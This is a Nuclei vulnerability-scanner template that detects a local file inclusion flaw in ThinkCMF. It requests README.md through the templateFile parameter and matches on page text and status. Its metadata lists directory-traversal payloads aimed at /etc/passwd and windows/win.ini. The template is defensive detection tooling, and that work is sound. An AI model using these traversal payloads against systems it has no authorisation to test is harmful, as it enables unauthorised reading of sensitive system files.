nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml

32 lines
651 B
YAML

id: thinkcmf-lfi
info:
name: ThinkCMF LFI
author: pikpikcu
severity: high
reference:
- https://www.freebuf.com/vuls/217586.html
metadata:
win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
tags: thinkcmf,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?a=display&templateFile=README.md"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "ThinkCMF"
- "## README"
- "## UPDATE"
- type: status
status:
- 200